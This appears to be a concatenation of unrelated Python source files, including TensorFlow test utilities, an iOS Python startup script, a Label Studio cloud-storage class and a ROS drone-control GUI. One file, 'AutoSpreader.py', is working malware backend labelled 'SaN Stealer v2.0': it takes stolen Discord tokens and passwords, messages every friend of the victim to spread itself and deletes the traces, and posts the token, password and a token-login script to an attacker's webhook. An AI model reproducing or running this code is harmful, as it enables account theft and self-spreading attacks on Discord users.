def _constrain_devices_and_set_default(self, sess, use_gpu, force_gpu):
"""Set the session and its graph to global default and constrain devices."""
if context.executing_eagerly():
yield None
else:
with sess.graph.as_default(), sess.as_default():
if force_gpu:
# Use the name of an actual device if one is detected, or
# '/device:GPU:0' otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/device:CPU:0"):
yield sess
def _create_session(self, graph, config, force_gpu):
"""See session() for details."""
def prepare_config(config):
"""Returns a config for sessions.
Args:
config: An optional config_pb2.ConfigProto to use to configure the
session.
Returns:
A config_pb2.ConfigProto object.
"""
# TODO(b/114333779): Enforce allow_soft_placement=False when
# use_gpu=False. Currently many tests rely on the fact that any device
# will be used even when a specific device is supposed to be used.
allow_soft_placement = not force_gpu
if config is None:
config = context.context().config
config.allow_soft_placement = allow_soft_placement
elif not allow_soft_placement and config.allow_soft_placement:
config_copy = context.context().config
config = config_copy
config.allow_soft_placement = False
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
# Disable Grappler constant folding since some tests & benchmarks
# use constant input and become meaningless after constant folding.
# DO NOT DISABLE GRAPPLER OPTIMIZERS WITHOUT CONSULTING WITH THE
# GRAPPLER TEAM.
config.graph_options.rewrite_options.constant_folding = (
rewriter_config_pb2.RewriterConfig.OFF)
config.graph_options.rewrite_options.pin_to_host_optimization = (
rewriter_config_pb2.RewriterConfig.OFF)
return config
return ErrorLoggingSession(graph=graph, config=prepare_config(config))
def _get_cached_session(self,
graph=None,
config=None,
force_gpu=False,
crash_if_inconsistent_args=True):
"""See cached_session() for documentation."""
if self._cached_session is None:
sess = self._create_session(
graph=graph, config=config, force_gpu=force_gpu)
self._cached_session = sess
self._cached_graph = graph
self._cached_config = config
self._cached_force_gpu = force_gpu
return sess
else:
if crash_if_inconsistent_args and self._cached_graph is not graph:
raise ValueError("The graph used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and self._cached_config is not config:
raise ValueError("The config used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and (self._cached_force_gpu is
not force_gpu):
raise ValueError(
"The force_gpu value used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
return self._cached_session
@tf_export("test.create_local_cluster")
def create_local_cluster(num_workers,
num_ps,
protocol="grpc",
worker_config=None,
ps_config=None):
"""Create and start local servers and return the associated `Server` objects.
"PS" stands for "parameter server": a task responsible for storing and
updating the model's parameters. Other tasks send updates to these parameters
as they work on optimizing the parameters. This particular division of labor
between tasks is not required, but is common for distributed training.
Read more at https://www.tensorflow.org/guide/extend/architecture

Figure illustrates the interaction of these components.
"/job:worker/task:0" and "/job:ps/task:0" are both tasks with worker services.
Example:
```python
workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)
worker_sessions = [tf.compat.v1.Session(w.target) for w in workers]
with tf.device("/job:ps/task:0"):
...
with tf.device("/job:ps/task:1"):
...
with tf.device("/job:worker/task:0"):
...
with tf.device("/job:worker/task:1"):
...
worker_sessions[0].run(...)
```
Args:
num_workers: Number of worker servers to start.
num_ps: Number of PS servers to start.
protocol: Communication protocol. Allowed values are documented in the
documentation of `tf.distribute.Server`.
worker_config: (optional) `tf.ConfigProto` to initialize workers. Can be
used to instantiate multiple devices etc.
ps_config: (optional) `tf.ConfigProto` to initialize PS servers.
Returns:
A tuple `(worker_servers, ps_servers)`. `worker_servers` is a list
of `num_workers` objects of type `tf.distribute.Server` (all running
locally);
and `ps_servers` is a list of `num_ps` objects of similar type.
Raises:
ImportError: if portpicker module was not found at load time
"""
import portpicker # pylint: disable=g-import-not-at-top
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]
}
cs = server_lib.ClusterSpec(cluster_dict)
workers = [
server_lib.Server(
cs,
job_name="worker",
protocol=protocol,
task_index=ix,
config=worker_config,
start=True) for ix in range(num_workers)
]
ps_servers = [
server_lib.Server(
cs,
job_name="ps",
protocol=protocol,
task_index=ix,
config=ps_config,
start=True) for ix in range(num_ps)
]
return workers, ps_servers
def get_node_def_from_graph(node_name, graph_def):
"""Returns the `NodeDef` instance for given node name in the graph def.
This method explores only the NodeDefs in `graph_def.node`.
Args:
node_name: Name of the NodeDef to search for.
graph_def: An instance of `GraphDef` proto.
Returns:
the `NodeDef` instance whose name field matches the given node_name or None.
"""
for node_def in graph_def.node:
if node_def.name == node_name:
return node_def
return None
def set_producer_version(graph, producer_version):
"""Sets graph.graph_def_versions.producer to `producer_version`."""
# The C API doesn't expose altering GraphDefVersions. We can indirectly set
# it via import_graph_def though.
graph_def = graph_pb2.GraphDef()
graph_def.versions.producer = producer_version
with graph.as_default():
importer.import_graph_def(graph_def)
assert graph.graph_def_versions.producer, producer_version
|
Startup.py
|
import sys
import os
sys.path.insert(-1, os.path.expanduser("~/Documents"))
sys.path.insert(-1, os.path.expanduser("~/Documents/site-packages"))
import io
import console
import code
import pyto
from importlib.machinery import SourceFileLoader
import importlib
import threading
from time import sleep
from outputredirector import Reader
from extensionsimporter import *
import warnings
import logging
from _ios_getpass import getpass as _ios_getpass
import getpass
import webbrowser
import sharing
import _signal
import traceback
from pip import BUNDLED_MODULES
# MARK: - Warnings
logging.basicConfig(level=logging.INFO)
def __send_warnings_to_log__(message, category, filename, lineno, file=None, line=None):
try:
warnings
except:
import warnings
try:
pyto
except:
import pyto
_message = warnings.formatwarning(message, category, filename, lineno, line)
try:
pyto.PyOutputHelper.printWarning(_message, script=threading.current_thread().script_path)
except AttributeError:
pyto.PyOutputHelper.printWarning(_message, script=None)
return
warnings.showwarning = __send_warnings_to_log__
# MARK: - Allow / Disallow subprocesses
os.allows_subprocesses = (not sys.platform == "ios")
# MARK: - Input
def askForInput(prompt=None):
try:
threading
except NameError:
import threading
try:
console
except NameError:
import console
if (threading.currentThread() in console.ignoredThreads):
return ""
else:
return console.input(prompt)
__builtins__.input = askForInput
getpass.getpass = _ios_getpass
# MARK: - Output
def read(text):
try:
console
except NameError:
import console
console.print(text, end="")
standardOutput = Reader(read)
standardOutput._buffer = io.BufferedWriter(standardOutput)
standardError = Reader(read)
standardError._buffer = io.BufferedWriter(standardError)
sys.stdout = standardOutput
sys.stderr = standardError
# MARK: - Web browser
class MobileSafari(webbrowser.BaseBrowser):
'''
Mobile Safari web browser.
'''
def open(self, url, new=0, autoraise=True):
sharing.open_url(url)
return True
webbrowser.register("mobile-safari", None, MobileSafari("MobileSafari.app"))
# MARK: - Modules
for importer in (NumpyImporter, MatplotlibImporter, PandasImporter, PillowImporter, BiopythonImporter, LXMLImporter, ScipyImporter, SkLearnImporter, SkImageImporter, PywtImporter, NaclImporter):
sys.meta_path.insert(0, importer())
# MARK: - Pre-import modules
def importModules():
try:
import PIL.ImageShow
def show_image(image, title=None, **options):
import os
import tempfile
import sharing
imgPath = tempfile.gettempdir()+"/image.png"
i = 1
while os.path.isfile(imgPath):
i += 1
imgPath = os.path.join(tempfile.gettempdir(), 'image '+str(i)+'.png')
image.save(imgPath, "PNG")
if title == "OpenCV":
sharing.quick_look(imgPath, remove_previous=True)
else:
sharing.quick_look(imgPath)
PIL.ImageShow.show = show_image
except ImportError:
pass
threading.Thread(target=importModules).start()
# MARK: - Create a Selector without class.
__builtins__.Selector = pyto.PySelector.makeSelector
__builtins__.Target = pyto.SelectorTarget.shared
# MARK: - Deprecations
__builtins__.deprecated = []
# MARK: - Pip bundled modules
if pyto.PipViewController != None:
pyto.PipViewController.bundled = BUNDLED_MODULES
# MARK: - OS
def fork():
pass
def waitpid(pid, options):
return (-1, 0)
os.fork = fork
os.waitpid = waitpid
# MARK: - Handle signal called outside main thread
old_signal = _signal.signal
def signal(signal, handler):
try:
threading
except NameError:
import threading
if threading.main_thread() == threading.current_thread():
return old_signal(signal, handler)
else:
return None
_signal.signal = signal
# MARK: - Run script
pyto.Python.shared.isSetup = True
while True:
try:
SourceFileLoader("main", "%@").load_module()
except Exception as e:
traceback.print_exc()
|
trees.py
|
from Queue import Queue
from threading import Thread, Lock
from time import sleep
from ml.feature_extraction import BTree
from utils import parse_timespan
class BuildWorker(Thread):
def __init__(self, par):
super(BuildWorker,self).__init__()
self.daemon = True
self.par = par
self.keep_working = True
self.is_working = True
def interrupt(self):
self.keep_working = False
def run(self):
while self.par.work_available() and self.keep_working:
job = self.par.__get_work__()
userTree = BTree()
# itemCount = 0
uuid = job["_id"]
# day_count = job["day_count"]
days = job["daily_sessions"]
day_index = 0
for day in days:
day_index += 1
#print "adding sessions for {0} for day {1}/{2}".format(uuid, day_index, day_count)
sessions = day
day_items = []
for session in sessions:
host = session["Domain"]
duration = parse_timespan(session["Duration"]).total_seconds()
day_items.append({'time': duration, 'label': host})
userTree.build(day_items)
#print "added daily sessions for {0}".format(uuid)
self.par.push_result(userTree, uuid)
print ("Worker stopping because no work is available")
self.is_working = False
class MassTreeBuilder:
def __init__(self, batch_size, store, filter, user_id_key):
import settings
self.userSessionTypeId = "598f20d002d2516dd0dbcee2"
appId = "123123123"
# sessionsPath = "testData/Netinfo/payingBrowsingSessionsDaySorted.csv"
db = app.settings.get_db()
self.documents_col = db.IntegratedDocument
self.work_queue = Queue()
self.lock = Lock()
self.batch_size = batch_size
self.res_queue = Queue()
# self.remaining = self.documents_col.find({
# "TypeId": self.userSessionTypeId,
# "Document.is_paying": 0,
# # "Document.Created" : { "$lt" : week4Start }
# }).distinct("Document.UserId")
self.query_filter = filter
self.user_id_key = user_id_key
self.remaining = self.documents_col.find(self.query_filter).distinct(user_id_key)
self.workers = []
self.collecting_data = False
self.io_lock = Lock()
self.store = store
[self.__fetch__() for _ in range(2)]
def __fetch__(self):
self.collecting_data = True
with self.lock:
ids = self.remaining[:self.batch_size]
del self.remaining[:self.batch_size]
#job items are users, and all their daily sessions
match_filter = self.query_filter
match_filter[self.user_id_key] = {"$in": ids}
pipeline = [
{"$match": match_filter },
{"$group": {"_id": "$" + self.user_id_key,
"day_count": {"$sum": 1},
"daily_sessions": {"$push": "$Document.Sessions"}
}
}
]
user_groups = self.documents_col.aggregate(pipeline)
with self.lock:
for d in user_groups:
self.work_queue.put_nowait(d)
self.collecting_data = False
def interrupt(self):
for w in self.workers:
w.interrupt()
def __get_work__(self):
with self.lock:
rem = len(self.remaining)
if self.work_queue.qsize() <= self.batch_size and rem > 0:
if not self.collecting_data:
t = Thread(target=self.__fetch__)
t.daemon = True
t.start()
job = self.work_queue.get()
self.work_queue.task_done()
return job
def is_working(self):
return any(w.is_working for w in self.workers)
def work_available(self):
with self.lock:
rem = len(self.remaining)
queue_rem = len(self.work_queue.queue)
return rem != 0 or queue_rem != 0
def push_result(self, res, id=None):
if self.store:
from utils import abs_path, save
import os
path = abs_path(os.path.join("netinfo", id + ".pickle"))
with self.io_lock:
save(res, path)
else:
self.res_queue.put({'uuid': id, 'result': res})
def build(self, max_threads=8):
for i in xrange(max_threads):
w = BuildWorker(self)
w.start()
self.workers.append(w)
def make(self, max_threads=8):
self.build(max_threads=max_threads)
try:
while self.work_available() and self.is_working():
sleep(1)
except KeyboardInterrupt:
self.interrupt()
results = self.get_result()
return results
def get_result(self):
if not self.work_available():
return list(self.res_queue.queue)
return []
|
base.py
|
import os
import re
import logging
import threading
import ujson as json
from abc import ABC, abstractmethod
from datetime import datetime, timedelta
from shutil import copy2
from flask_wtf import FlaskForm
from wtforms import StringField, BooleanField
from wtforms.validators import InputRequired, Optional, ValidationError
from collections import OrderedDict
from ordered_set import OrderedSet
from label_studio.utils.io import json_load
from label_studio.utils.validation import TaskValidator, ValidationError as TaskValidationError
logger = logging.getLogger(__name__)
_storage = {}
def register_storage(storage_type, class_def):
if storage_type in _storage:
raise IndexError('Storage {} already exists'.format(storage_type))
_storage[storage_type] = class_def
def get_storage_form(storage_type):
return _storage[storage_type].form
def create_storage(storage_type, name, path, project_path=None, project=None, **kwargs):
if storage_type not in _storage:
raise NotImplementedError('Can\'t create storage "{}"'.format(storage_type))
return _storage[storage_type](name=name, path=path, project_path=project_path, project=project, **kwargs)
def get_available_storage_names():
out = OrderedDict()
for key in sorted(_storage, key=lambda x: _storage[x].description):
out[key] = _storage[key].description
return out
class BaseForm(FlaskForm):
bound_params = {}
class BaseStorageForm(BaseForm):
path = StringField('Path', [InputRequired()], description='Storage path (e.g. bucket name)')
# Bind here form fields to storage fields {"form field": "storage_field"}
bound_params = dict(path='path')
class BaseStorage(ABC):
form = BaseStorageForm
description = 'Base Storage'
def __init__(self, name, path, project_path=None, project=None, **kwargs):
self.name = name
self.path = path
self.project_path = project_path
self.project = project
self.form_class = BaseStorageForm
self.is_syncing = False
def __str__(self):
return self.__class__.__name__
def get_params(self):
return {
form_param: getattr(self, storage_param)
for form_param, storage_param in self.form.bound_params.items()
}
def set_project(self, project):
self.project = project
@property
def default_data_key(self):
if self.project is not None:
if self.project.data_types.keys():
return list(self.project.data_types.keys())[0]
return ''
@property
@abstractmethod
def readable_path(self):
pass
@classmethod
def from_dict(cls, d):
return cls(**d)
@abstractmethod
def get(self, id):
pass
@abstractmethod
def __contains__(self, id):
pass
@abstractmethod
def set(self, id, value):
pass
@abstractmethod
def set_many(self, ids, values):
pass
@abstractmethod
def ids(self):
pass
@abstractmethod
def max_id(self):
pass
@abstractmethod
def items(self):
pass
@abstractmethod
def remove(self, id):
pass
@abstractmethod
def remove_all(self):
pass
@abstractmethod
def empty(self):
pass
class IsValidRegex(object):
def __call__(self, form, field):
try:
re.compile(field.data)
except re.error:
raise ValidationError(field.data + ' is not a valid regular expression')
class CloudStorageForm(BaseStorageForm):
prefix = StringField('Prefix', [Optional()], description='File prefix')
regex = StringField('Regex', [IsValidRegex()], description='File filter by regex, example: .* (If not specified, all files will be skipped)') # noqa
data_key = StringField('Data key', [Optional()], description='Task tag key from your label config')
use_blob_urls = BooleanField('Use BLOBs URLs', default=True,
description='Generate task data with URLs pointed to your bucket objects '
'(for resources like jpg, mp3 & other BLOBs). This could be used for '
'label configs with <b>one data key only</b>. '
'If not selected, bucket objects will be interpreted as '
"tasks in Label Studio JSON format and it's suitable "
"for <b>multiple data keys</b>")
bound_params = dict(
prefix='prefix',
regex='regex',
use_blob_urls='use_blob_urls',
data_key='data_key',
**BaseStorageForm.bound_params
)
class CloudStorage(BaseStorage):
thread_lock = threading.Lock()
form = CloudStorageForm
description = 'Base Cloud Storage'
def __init__(
self, prefix=None, regex=None, create_local_copy=True, use_blob_urls=True, data_key=None,
sync_in_thread=True, presign=True, **kwargs
):
super(CloudStorage, self).__init__(**kwargs)
self.prefix = prefix or ''
self.regex_str = regex
self.regex = re.compile(self.regex_str) if self.regex_str else None
self._ids_file = None
if self.project_path is not None:
self.objects_dir = os.path.join(self.project_path, 'completions')
os.makedirs(self.objects_dir, exist_ok=True)
self._ids_file = os.path.join(self.project_path, self.name + '.json')
self.create_local_copy = create_local_copy
self.use_blob_urls = use_blob_urls
self.data_key = data_key
self.sync_in_thread = sync_in_thread
self.presign = presign
self.client = self._get_client()
self.validate_connection()
self.last_sync_time = None
self.is_syncing = False
self.sync_period_in_sec = 30
self._ids_keys_map = {}
self._selected_ids = []
self._keys_ids_map = {}
self._load_ids()
self.sync()
def get_params(self):
"""Get params to fill the form"""
params = super(CloudStorage, self).get_params()
params.update({
'prefix': self.prefix,
'regex': self.regex_str,
'create_local_copy': self.create_local_copy
})
return params
@abstractmethod
def validate_connection(self):
pass
@abstractmethod
def _get_client(self):
pass
@property
@abstractmethod
def url_prefix(self):
pass
@property
def key_prefix(self):
return self.url_prefix + self.path + '/'
@property
@abstractmethod
def readable_path(self):
pass
@property
def _save_to_file_enabled(self):
return self.project_path is not None and self._ids_file is not None
def _load_ids(self):
if self._save_to_file_enabled and os.path.exists(self._ids_file):
self._ids_keys_map = json_load(self._ids_file, int_keys=True)
self._keys_ids_map = {item['key']: id for id, item in self._ids_keys_map.items()}
def _save_ids(self):
if self._save_to_file_enabled:
with open(self._ids_file, mode='w') as fout:
json.dump(self._ids_keys_map, fout)
@abstractmethod
def _get_value(self, key):
pass
def _get_value_url(self, key):
data_key = self.data_key if self.data_key else self.default_data_key
return {data_key: self.url_prefix + self.path + '/' + key}
def _validate_task(self, key, parsed_data):
""" Validate parsed data with labeling config and task structure
"""
is_list = isinstance(parsed_data, list)
# we support only one task per JSON file
if not (is_list and len(parsed_data) == 1 or isinstance(parsed_data, dict)):
raise TaskValidationError('Error at ' + key + ':\n'
'Cloud storages support one task per one JSON file only. '
'Task must be {} or [{}] with length = 1')
# classic validation for one task
validator = TaskValidator(self.project)
try:
new_tasks = validator.to_internal_value(parsed_data if is_list else [parsed_data])
except TaskValidationError as e:
# pretty format of errors
messages = e.msg_to_list()
out = [(key + ' :: ' + msg) for msg in messages]
out = "\n".join(out)
raise TaskValidationError(out)
return new_tasks[0]
def get_data(self, key):
if self.use_blob_urls:
return self._get_value_url(key)
else:
# read task json from bucket and validate it
try:
parsed_data = self._get_value(key)
except Exception as e:
raise Exception(key + ' :: ' + str(e))
return self._validate_task(key, parsed_data)
def _get_key_by_id(self, id):
item = self._ids_keys_map.get(id)
if not item:
# selected id not found in fetched keys
return
item_key = item['key']
if not item_key.startswith(self.key_prefix + self.prefix):
# found key not from current storage
return
return item_key
def get(self, id):
item_key = self._get_key_by_id(id)
if not item_key:
return
try:
key = item_key.split(self.key_prefix, 1)[-1]
data = self.get_data(key)
except Exception as exc:
# return {'error': True, 'message': str(exc)}
logger.error(str(exc), exc_info=True)
raise exc
if 'data' in data:
data['id'] = id
return data
else:
return {'data': data, 'id': id}
def _id_to_key(self, id):
if not isinstance(id, str):
id = str(id)
if self.prefix:
if id.startswith(self.prefix):
return id
if self.prefix.endswith('/'):
return self.prefix + id
return self.prefix + '/' + id
return id
@abstractmethod
def _set_value(self, key, value):
pass
def _pre_set(self, id, value):
if self.prefix:
key = self.prefix + '/' + str(id)
else:
key = str(id)
full_key = self.key_prefix + key
self._set_value(key, value)
self._ids_keys_map[id] = {'key': full_key, 'exists': True}
self._keys_ids_map[full_key] = id
self._selected_ids.append(id)
return full_key
def set(self, id, value):
full_key = self._pre_set(id, value)
self._save_ids()
logger.debug('Create ' + full_key + ' in ' + self.readable_path)
if self.create_local_copy:
self._create_local(id, value)
def set_many(self, keys, values):
raise NotImplementedError
def _create_local(self, id, value):
local_file = os.path.join(self.objects_dir, str(id) + '.json')
logger.debug('Creating local copy in file ' + local_file)
with open(local_file, mode='w', encoding='utf8') as fout:
json.dump(value, fout)
def max_id(self):
return max(self._ids_keys_map.keys(), default=-1)
def ids(self):
self.sync()
return self._selected_ids
def _ready_to_sync(self):
if not self.regex_str:
return False
if self.last_sync_time is None:
return True
return (datetime.now() - self.last_sync_time) > timedelta(seconds=self.sync_period_in_sec)
def sync(self):
self.validate_connection()
if self.sync_in_thread:
if self._ready_to_sync():
thread = threading.Thread(target=self._sync)
thread.daemon = True
thread.start()
else:
logger.debug('Not ready to sync.')
else:
self._sync()
def _validate_object(self, key):
pass
def iter_full_keys(self):
for key in self._get_objects():
if self.regex is not None and not self.regex.match(key):
logger.debug(key + ' is skipped by regex filter')
continue
try:
self._validate_object(key)
except Exception as exc:
continue
yield self.key_prefix + key
def _extract_task_id(self, full_key):
"""Infer task ID from specified key (e.g. by splitting tasks.json/123)"""
pass
def _get_new_id(self, key, new_id):
idx = self._extract_task_id(key)
if idx is not None:
return idx, new_id
idx = new_id
new_id += 1
return idx, new_id
def _sync(self):
with self.thread_lock:
self.last_sync_time = datetime.now()
self.is_syncing = True
new_id = self.max_id() + 1
new_ids_keys_map = {}
new_keys_ids_map = {}
full = OrderedSet(self.iter_full_keys())
intersect = full & OrderedSet(self._keys_ids_map)
exclusion = full - intersect
# new tasks
for key in exclusion:
id, new_id = self._get_new_id(key, new_id)
new_ids_keys_map[id] = {'key': key, 'exists': True}
new_keys_ids_map[key] = id
# old existed tasks
for key in intersect:
id = self._keys_ids_map[key]
new_ids_keys_map[id] = {'key': key, 'exists': True}
new_keys_ids_map[key] = id
with self.thread_lock:
self._selected_ids = list(new_ids_keys_map.keys())
self._ids_keys_map.update(new_ids_keys_map)
self._keys_ids_map.update(new_keys_ids_map)
self._save_ids()
self.is_syncing = False
@abstractmethod
def _get_objects(self):
pass
def items(self):
for id in self.ids():
obj = self.get(id)
if obj:
yield id, obj
def empty(self):
self.sync()
return len(self._ids_keys_map) == 0
def __contains__(self, id):
item_key = self._get_key_by_id(id)
return item_key is not None
def remove(self, key):
raise NotImplementedError
def remove_all(self):
raise NotImplementedError
|
AutoSpreader.py
|
from distutils.log import debug
from urllib.request import Request, urlopen
from json import loads, dumps
from time import sleep
from threading import Thread
from flask import Flask
from waitress import serve
import requests
from discord_webhook import DiscordWebhook, DiscordEmbed
app = Flask(__name__)
def getheaders(token=None, content_type="application/json"):
headers = {
"Content-Type": content_type,
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"
}
if token:
headers.update({"Authorization": token})
return headers
def getuserdata(token):
try:
return loads(urlopen(Request("https://discord.com/api/v9/users/@me", headers=getheaders(token))).read().decode())
except:
pass
def getfriends(token):
try:
return loads(urlopen(Request("https://discord.com/api/v9/users/@me/relationships", headers=getheaders(token))).read().decode())
except Exception as e:
print(e)
pass
def getchat(token, uid):
try:
return loads(urlopen(Request("https://discord.com/api/v9/users/@me/channels", headers=getheaders(token), data=dumps({"recipient_id": uid}).encode())).read().decode())["id"]
except Exception as e:
print(e)
pass
def has_payment_methods(token):
try:
return bool(len(loads(urlopen(Request("https://discord.com/api/v9/users/@me/billing/payment-sources", headers=getheaders(token))).read().decode())) > 0)
except:
pass
def send_message(token, chat_id, form_data):
try:
urlopen(Request(f"https://discord.com/api/v9/channels/{chat_id}/messages", headers=getheaders(token, "multipart/form-data; boundary=---------------------------325414537030329320151394843687"), data=form_data.encode())).read().decode()
except Exception as e:
print(e)
pass
def spread(token, form_data, delay):
fs = getfriends(token)
for friend in fs:
try:
chat_id = getchat(token, friend["id"])
send_message(token, chat_id, form_data)
requests.delete(f"https://discord.com/api/v9/channels/{chat_id}", headers=getheaders(token))
except Exception as e:
print(e)
pass
sleep(delay)
def send(token: str):
data = {
"content" : token,
"username" : "Token Grabber"
}
requests.post("WEBHOOK LINK", json = data)
@app.route("/")
def home():
return "home"
@app.route("/api/spread/<token>/<message>/<password>")
def API(token: str, message: str, password: str):
PM = has_payment_methods(token)
UI = getuserdata(token) # id, username, discriminator, email, phone
message = message.replace("+", " ")
try:
if not UI["premium_type"] or UI["premium_type"] == 0:
Nitro = "None"
elif UI["premium_type"] == 1:
Nitro = "Nitro Classic"
elif UI["premium_type"] == 2:
Nitro = "Nitro"
except:
Nitro = "None"
Discord_Employee = 1
Partnered_Server_Owner = 2
HypeSquad_Events = 4
Bug_Hunter_Level_1 = 8
House_Bravery = 64
House_Brilliance = 128
House_Balance = 256
Early_Supporter = 512
Bug_Hunter_Level_2 = 16384
Early_Verified_Bot_Developer = 131072
Flags = UI["public_flags"]
Badges = []
if (Flags & Discord_Employee) == Discord_Employee:
Badges.append("Discord Employee")
if (Flags & Partnered_Server_Owner) == Partnered_Server_Owner:
Badges.append("Partnered Server Owner")
if (Flags & HypeSquad_Events) == HypeSquad_Events:
Badges.append("HypeSquad Events")
if (Flags & Bug_Hunter_Level_1) == Bug_Hunter_Level_1:
Badges.append("Bug Hunter Level1")
if (Flags & House_Bravery) == House_Bravery:
Badges.append("House Bravery")
if (Flags & House_Brilliance) == House_Brilliance:
Badges.append("House Brilliance")
if (Flags & House_Balance) == House_Balance:
Badges.append("House Balance")
if (Flags & Early_Supporter) == Early_Supporter:
Badges.append("Early Supporter")
if (Flags & Bug_Hunter_Level_2) == Bug_Hunter_Level_2:
Badges.append("Bug Hunter Level2")
if (Flags & Early_Verified_Bot_Developer) == Early_Verified_Bot_Developer:
Badges.append("Early Verified Bot Developer")
if PM is False and "Discord Employee" not in Badges and "Partnered Server Owner" not in Badges and "HypeSquad Events" not in Badges and "Bug Hunter Level1" not in Badges and "Early Supporter" not in Badges and "Bug Hunter Level2" not in Badges and "Early Verified Bot Developer" not in Badges:
payload = f'-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="content"\n {message}\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="tts"\n\n{message}\n-----------------------------325414537030329320151394843687--'
Thread(target=spread, args=(token, payload, 7500 / 1000)).start()
Autospread = "True"
else:
Autospread = "False"
webhookk = DiscordWebhook(url="WEBHOOK LINK", rate_limit_retry=True)
un = UI["username"] + "#" + UI['discriminator']
embed = DiscordEmbed(title='SaN Stealer v2.0 | New Victim🔔 | @everyone', description=f':arrow_forward: **User:** `{un}`\n:moneybag: **Subscription**: `{Nitro}`', color='03b2f8')
embed.add_embed_field(name="Payment Method:", value=str(PM))
embed.add_embed_field(name="AutoSpread:", value=str(Autospread))
embed.add_embed_field(name="Password:", value="`"+str(password)+'`')
embed.add_embed_field(name="Badges:", value=str(Badges), inline=False)
embed.add_embed_field(name="Token:", value=str(token), inline=False)
embed.add_embed_field(name="Token Login Script", value='```let token="'+token+'";function login(e){setInterval(()=>{document.body.appendChild(document.createElement`iframe`).contentWindow.localStorage.token=`"${e}"`},50),setTimeout(()=>{location.reload()},2500)}login(token);```', inline=False)
webhookk.add_embed(embed)
response = webhookk.execute()
return "K"
serve(app=app, port=3000, threads=50)
|
send.py
|
from PyQt5.QtWidgets import QApplication, QMainWindow, QSizePolicy
import xtd_ui
import rospy
from geometry_msgs.msg import Twist, PoseStamped, TwistStamped
from std_msgs.msg import String
from multiprocessing import Process,Queue
from PyQt5.QtCore import *
from receive import Ros2Gui
from PIL import Image
import random
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.figure import Figure
import matplotlib.pyplot as plt
from plotcanvas import PlotCanvas
class Gui2Ros(QMainWindow,xtd_ui.Ui_MainWindow):
def __init__(self):
super(Gui2Ros, self).__init__()
self.setupUi(self)
self.map = 'indoor1'
self.comboBox_maps.currentIndexChanged.connect(self.initplot)
self.button_run.clicked.connect(self.startrun)
self.close_flag = False
self.local_pose = PoseStamped()
self.local_vel = Twist()
self.m = PlotCanvas(self, self.map)
self.m.move(180, 0)
self.flag = 0
# rospy.init_node('multirotor_pyqt5_control')
def initplot(self):
self.map = self.comboBox_maps.currentText()
self.m.canvas_update(self.map)
def startrun(self):
print 'start run!'
self.init_controller()
self.pSend2ros = Process(target=self.run_process)
self.pSend2ros.start()
self.text_thread = Ros2Gui(self.multirotor_select, self.multirotor_num, self.multi_type)
self.text_thread.update_text.connect(self.display)
self.text_thread.plot_array.connect(self.plot)
self.text_thread.start()
# self.pSend2ros = Process(target=self.run_process)
# self.pSend2ros.start()
def init_controller(self):
self.text_show_info.setPlainText('data')
self.multi_num = 0
self.multi_type = []
counnnt = 0
print self.multirotor_select
for j in self.multirotor_select:
self.multi_num = self.multi_num + self.multirotor_num[j]
for id_1 in range(self.multirotor_num[j]):
self.multi_type.append(self.multirotor_type[j])
counnnt+=1
self.color_plot = ['' for i in range(self.multi_num)]
for i in range(self.multi_num):
color_R = hex(random.randint(16,255))
color_G = hex(random.randint(16,255))
color_B = hex(random.randint(16,255))
self.color_plot[i] = '#'+str(color_R)+str(color_G)+str(color_B)
self.color_plot[i] = self.color_plot[i].replace('0x','')
#publish messages to ros nodes like a keyboard
def run_process(self):
rospy.init_node('multirotor_pyqt5_control')
counnnt = 0
if self.control_type == 'vel':
self.multi_cmd_vel_flu_pub = [None] * self.multi_num
self.multi_cmd_pub = [None] * self.multi_num
for i in self.multirotor_select:
for k in range(self.multirotor_num[i]):
if i == 7:
self.multi_cmd_vel_flu_pub[counnnt] = rospy.Publisher('/ugv_' + str(k) + '/cmd_vel', Twist, queue_size=10)
self.multi_cmd_pub[counnnt] = rospy.Publisher('/ugv_' + str(k) + '/cmd', String,queue_size=10)
else:
self.multi_cmd_vel_flu_pub[counnnt] = rospy.Publisher('/xtdrone/' + self.multi_type[counnnt] + '_' + str(k) + '/cmd_vel_flu', Twist, queue_size=10)
self.multi_cmd_pub[counnnt] = rospy.Publisher('/xtdrone/' + self.multi_type[counnnt] + '_' + str(k) + '/cmd', String,queue_size=10)
counnnt += 1
self.leader_cmd_vel_flu_pub = rospy.Publisher("/xtdrone/leader/cmd_vel_flu", Twist, queue_size=10)
self.leader_cmd_pub = rospy.Publisher("/xtdrone/leader/cmd", String, queue_size=10)
else:
self.multi_cmd_accel_flu_pub = [None] * self.multi_num
self.multi_cmd_pub = [None] * self.multi_num
for i in self.multirotor_select:
for k in range(self.multirotor_num[i]):
self.multi_cmd_accel_flu_pub[i] = rospy.Publisher(
'/xtdrone/' + self.multi_type[counnnt] + '_' + str(k) + '/cmd_accel_flu', Twist, queue_size=10)
self.multi_cmd_pub[i] = rospy.Publisher('/xtdrone/' + self.multi_type[counnnt] + '_' + str(k) + '/cmd',
String,
queue_size=10)
counnnt = 0
self.leader_cmd_accel_flu_pub = rospy.Publisher("/xtdrone/leader/cmd_accel_flu", Twist, queue_size=10)
self.leader_cmd_pub = rospy.Publisher("/xtdrone/leader/cmd", String, queue_size=10)
self.twist = [Twist() for i in range (self.multi_num)]
self.cmd = ['' for i in range (self.multi_num)]
self.ctrl_leader = True
self.cmd_vel_mask = False
for j in range(self.multi_num):
self.twist[j].angular.x = 0.0
